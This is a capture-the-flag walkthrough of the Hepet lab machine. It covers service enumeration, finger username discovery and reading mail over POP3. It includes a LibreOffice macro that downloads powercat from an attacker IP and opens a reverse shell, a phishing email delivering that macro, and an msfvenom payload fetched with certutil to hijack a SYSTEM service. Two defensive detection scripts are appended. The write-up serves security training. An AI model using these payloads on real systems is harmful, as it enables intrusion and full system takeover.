
Proving Grounds Practice - Hepet

Difficulty

Medium

Scan

autorecon 192.168.184.140

[*] smtp found on tcp/25.
smtp Mercury/32 smtpd (Mail server account Maiser)
enum found login: admin

[*] finger found on tcp/79.
Mercury/32 fingerd
Login: Admin

[*] pop3pw found on tcp/106.
Mercury/32 poppass service


[*] pop3 found on tcp/110.
Mercury/32 pop3d

[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] imap found on tcp/143.
Mercury/32 imapd 4.62


[*] http found on tcp/443.
Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23


[*] microsoft-ds found on tcp/445.
smb

[*] http found on tcp/8000.
Apache/2.4.46 (Win64)

[*] ph-addressbook found on tcp/105.

[*] http found on tcp/2224.
Mercury HTTP Services

[*] unknown found on tcp/5040.

[*] vnc found on tcp/11100.
version: 3.8

[*] ftp found on tcp/20001.
FileZilla ftpd 0.9.41 beta
Anonymous FTP login allowed

[*] unknown found on tcp/33006.
MariaDB

[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669.



things to try
- mail user: admin
2224 reset passwd
11110 vnc 3.8
20001 ftp Anonymous FTP login allowed
vue-blog-demo v1.0.0

33006 MariaDB

8000 has /team /fonts maybe upload

20001 ftp

FTP allows anonymous login. Looking at the contents, it appears to be the website's source code; download it with lftp:

ftp -a -A 192.168.184.140 -P 20001
Connected to 192.168.184.140.
220-FileZilla Server version 0.9.41 beta
220-written by Tim Kosse ([email protected])
220 Please visit http://sourceforge.net/projects/filezilla/
331 Password required for anonymous
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
-r--r--r-- 1 ftp ftp 312 Oct 20 2020 .babelrc
-r--r--r-- 1 ftp ftp 147 Oct 20 2020 .editorconfig
-r--r--r-- 1 ftp ftp 23 Oct 20 2020 .eslintignore
-r--r--r-- 1 ftp ftp 779 Oct 20 2020 .eslintrc.js
-r--r--r-- 1 ftp ftp 167 Oct 20 2020 .gitignore
-r--r--r-- 1 ftp ftp 228 Oct 20 2020 .postcssrc.js
-r--r--r-- 1 ftp ftp 346 Oct 20 2020 .tern-project
drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 build
drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 config
-r--r--r-- 1 ftp ftp 1376 Oct 20 2020 index.html
-r--r--r-- 1 ftp ftp 425010 Oct 20 2020 package-lock.json
-r--r--r-- 1 ftp ftp 2454 Oct 20 2020 package.json
-r--r--r-- 1 ftp ftp 1100 Oct 20 2020 README.md
drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 src
drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 static
-r--r--r-- 1 ftp ftp 127 Oct 20 2020 _redirects
226 Transfer OK
ftp>
lftp -e "mirror -c -e / ftp" ftp://192.168.184.140:20001

The CMS is vue-blog-demo v1.0.0, with no further information, and port 8000 does not appear to be running it either. Searching for FileZilla ftpd 0.9.41 beta turns up no exploitable known vulnerabilities.

445 smbclient

Anonymous login is not supported. Brute-forcing the password of the enumerated admin user yields nothing:

hydra -l admin -P /usr/share/wordlists/rockyou.txt smb://192.168.184.140
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-23 15:53:36
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.184.140:445/
[ERROR] invalid reply from target smb://192.168.184.140:445/

2224 mlss

Mailing list subscriber services, with subscribe and forgot-password functions. Nothing exploitable for now, and no known vulnerabilities for mlss turn up either.

79 finger

Enumerate usernames with finger-user-enum.pl.

GitHub: https://github.com/pentestmonkey/finger-user-enum

I saw the tool in this walkthrough: https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.184.140 |grep -v 'is not known'
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )


######## Scan started at Sun Feb 23 16:27:33 2025 #########
admin@192.168.184.140: Login: admin Name: Mail System Administrator....[No profile information]..
agnes@192.168.184.140: Login: agnes Name: Agnes....[No profile information]..
charlotte@192.168.184.140: Login: charlotte Name: Charlotte....[No profile information]..
jonas@192.168.184.140: Login: jonas Name: Jonas....[No profile information]..
magnus@192.168.184.140: Login: magnus Name: Magnus....[No profile information]..
martha@192.168.184.140: Login: martha Name: Martha....[No profile information]..

Mercury/32 mail

Enumerate usernames once more:

hydra smtp-enum://192.168.180.140:25/expn -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" 2>&1

Mercury/32 has a known buffer-overflow vulnerability, but the version number is unknown; I tested one exploit and it did not succeed.

8000 / 443

Basically static pages, with nothing to interact with.

Jonas K.'s bio reads like a password. I had missed it and only noticed after reading the hints; the walkthrough used html2markdown:

curl http://192.168.184.140:8000/ | html2markdown > html.md

After getting the password my first thought was smbclient, but the login failed, and FTP did not work either. After another look at the hints, log in to the mailbox:

telnet 192.168.184.140 110
Trying 192.168.184.140...
Connected to 192.168.184.140.
Escape character is '^]'.
+OK <14653593.7950@localhost>, POP3 server ready.
user Jonas
+OK Jonas is known here.
pass SicMundusCreatusEst
+OK Welcome! 4 messages (4744 bytes)
help
+OK
Mercury/32 MTS Post Office Protocol v3 server v4.62,
Copyright (c) 1993-2008 David Harris.
This server recognizes the following commands:
USER - login as a user
PASS - specify a password
APOP - perform secure login
CAPA - RFC2449 capability discovery
STLS - Start TLS negotiation, if enabled
STAT - show mailbox statistics
RETR - send a message
LIST - show message numbers and sizes
DELE - delete a message
RSET - 'undo' all mailbox changes
TOP - show lines from a message
QUIT - close the connection
NOOP, RPOP, LAST are also supported.

Extended commands:
XTND XMIT - Send a message via POP3
XTND XLST - Eudora extended list command
UIDL - return unique identifier (RFC1725).
.
list shows all messages
retr 2 shows the contents of message 2

The mails say: the newly hired PR person asks everyone to send their spreadsheets to mailadmin, and mailadmin tells everyone the company has switched to LibreOffice. A spreadsheet here is the equivalent of an Excel file in Office.

Foothold

Create a malicious ods file, following this guide:

https://books.libreoffice.org/en/GS70/GS7013-GettingStartedWithMacros.html

Reverse shell macro:

Sub Main
Shell("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.234/powercat.ps1');powercat -c 192.168.45.169 -p 4444 -e powershell")
End Sub

Configure the macro to run when the file is opened so that it spawns the reverse shell. Start http.server on port 80, send the attachment to mailadmin with sendemail, and after a short wait the reverse shell comes back as user Ela Arwel.

sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.184.140:25 -u 'another spreadsheet' -m 'spreadsheet' -a /home/kali/pentestools/windows/clientside/test.ods
Feb 23 15:54:03 kali sendemail[3004302]: Email was sent successfully!
rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.184.140] 51171
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Program Files\LibreOffice\program> whoami
whoami
hepet\ela arwel
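
A defender's counterpart to the macro-bearing spreadsheet above, added here as an example and not part of the original writeup or the LibreOffice project: a mail-gateway style check that opens an ODS package (a zip) and reports embedded script libraries and document-event hooks. The `Basic/` and `Scripts/` directories and the `dom:load` open-document event are assumed from the ODF package layout; the sample package is constructed inline and contains no payload.

```python
import io
import re
import zipfile

# ODF keeps embedded macros under these package directories (assumed from the ODF layout).
SCRIPT_DIRS = ("Basic/", "Scripts/")
# A document-level listener element in content.xml, and the two attributes we care about.
LISTENER_RE = re.compile(r"<script:event-listener\b[^>]*>", re.S)
ATTR_RE = re.compile(r'(script:event-name|xlink:href)="([^"]*)"')

def scan_ods(data: bytes) -> dict:
    """Report script entries, document-event hooks and a triage verdict for an ODS package."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        scripts = [n for n in names if n.startswith(SCRIPT_DIRS) and not n.endswith("/")]
        hooks = []
        if "content.xml" in names:
            content = z.read("content.xml").decode("utf-8", "replace")
            for element in LISTENER_RE.findall(content):
                attrs = dict(ATTR_RE.findall(element))
                target = attrs.get("xlink:href", "")
                if target.startswith("vnd.sun.star.script:"):  # embedded script bound to an event
                    hooks.append({"event": attrs.get("script:event-name", ""), "target": target})
    if hooks:
        verdict = "block"    # fires on open/load once macros are enabled, no further click needed
    elif scripts:
        verdict = "review"   # macros present but nothing wired to a document event
    else:
        verdict = "allow"
    return {"scripts": scripts, "hooks": hooks, "verdict": verdict}

def build_sample(with_macro: bool) -> bytes:
    """Constructed minimal ODS-like package holding only the entries the scanner inspects."""
    hook = ('<office:scripts><office:event-listeners>'
            '<script:event-listener script:language="ooo:script" script:event-name="dom:load" '
            'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document" '
            'xlink:type="simple"/></office:event-listeners></office:scripts>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet")
        if with_macro:
            z.writestr("Basic/script-lc.xml", "<library:libraries/>")
            z.writestr("Basic/Standard/script-lb.xml", "<library:library/>")
            z.writestr("Basic/Standard/Module1.xml",
                       '<script:module script:name="Module1">Sub Main\nEnd Sub</script:module>')
        z.writestr("content.xml",
                   "<office:document-content>%s</office:document-content>" % (hook if with_macro else ""))
    return buf.getvalue()
```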

Escalation

Enumeration shows that the VeyonService service is started as LocalSystem and that its binary lives under Ela Arwel's directory, where we have Full Control. Generate a reverse-shell executable with msfvenom and replace veyon-service.exe with it:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe -o shell.exe

PS C:\users> Get-CimInstance -ClassName Win32_Service | 
Select-Object Name, State, PathName, StartMode, StartName |
Where-Object { $_.State -like 'Running' -and $_.PathName -notlike '*svchost.exe*' }
Name : COMSysApp
State : Running
PathName : C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
StartMode : Manual
StartName : LocalSystem

...

Name : VeyonService
State : Running
PathName : C:\Users\Ela Arwel\Veyon\veyon-service.exe
StartMode : Auto
StartName : LocalSystem


PS C:\Users\Ela Arwel\Veyon> certutil -urlcache -f http://192.168.45.234/tmp/shell.exe s.exe
certutil -urlcache -f http://192.168.45.234/tmp/shell.exe s.exe
certutil -urlcache -f http://192.168.45.234/tmp/shell.exe s.exe
**** Online ****
CertUtil: -URLCache command completed successfully.



PS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe veyon.exe
mv veyon-service.exe veyon.exe
mv veyon-service.exe veyon.exe
PS C:\Users\Ela Arwel\Veyon> mv s.exe veyon-service.exe
mv s.exe veyon-service.exe
mv s.exe veyon-service.exe

There is no permission to restart the service, but the user can reboot the machine, so just run shutdown /r; after the reboot we get a SYSTEM shell.

PS C:\Users\Ela Arwel\Veyon> restart-service VeyonService
restart-service VeyonService
restart-service VeyonService
PS C:\Users\Ela Arwel\Veyon> restart-service : Service 'Veyon Service (VeyonService)' cannot be stopped due to the following error: Cannot open
VeyonService service on computer '.'.
At line:1 char:1
+ restart-service VeyonService
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service
], ServiceCommandException
+ FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.RestartServiceCommand



PS C:\Users\Ela Arwel\Veyon> net stop VeyonService
net stop VeyonService
net stop VeyonService
System error 5 has occurred.
PS C:\Users\Ela Arwel\Veyon>
Access is denied.


PS C:\Users\Ela Arwel\Veyon> shutdown /r /t 0
shutdown /r /t 0
shutdown /r /t 0

rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.184.140] 49668
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
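
A triage pass over service listings like the one above, added as an example that is not the writeup's own tooling: it parses the list-format output of Get-CimInstance Win32_Service (the sample is constructed, with a placeholder GUID, not the real host's output) and flags services that run as SYSTEM from a binary outside the protected system directories, which is exactly the condition abused here. Whether the flagged path is really writable still has to be confirmed on the host with icacls or Get-Acl.

```python
import re

# Constructed sample in the list format Get-CimInstance | Select-Object prints
# (only the keys the checker uses are kept); not the real host's output.
SAMPLE = r"""
Name      : COMSysApp
PathName  : C:\WINDOWS\system32\dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}
StartName : LocalSystem

Name      : ExampleSvc
PathName  : C:\Users\someuser\Tools\agent.exe
StartName : LocalSystem
"""

# Directories a standard user cannot write to by default; anything else deserves an ACL check.
PROTECTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
PRIVILEGED_ACCOUNTS = {"localsystem", "nt authority\\system"}

def parse_records(text: str) -> list:
    """Split 'Key : Value' blocks separated by blank lines into dicts."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records

def binary_path(pathname: str) -> str:
    """Executable part of a service command line (quoted, or unquoted up to '.exe')."""
    if pathname.startswith('"'):
        return pathname[1:pathname.find('"', 1)]
    m = re.match(r"(.*?\.exe)", pathname, re.I)
    return m.group(1) if m else pathname.split()[0]

def risky_services(text: str) -> list:
    """Services running as SYSTEM whose binary sits outside the protected directories."""
    flagged = []
    for rec in parse_records(text):
        exe = binary_path(rec.get("PathName", ""))
        if rec.get("StartName", "").lower() in PRIVILEGED_ACCOUNTS \
                and not exe.lower().startswith(PROTECTED_PREFIXES):
            flagged.append({"name": rec["Name"], "binary": exe, "account": rec["StartName"]})
    return flagged
```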

Reflections

  1. I still overlooked a lot during information gathering. Don't focus only on software and CMS vulnerabilities; manual enumeration matters just as much. Click through and inspect everything until you find the foothold.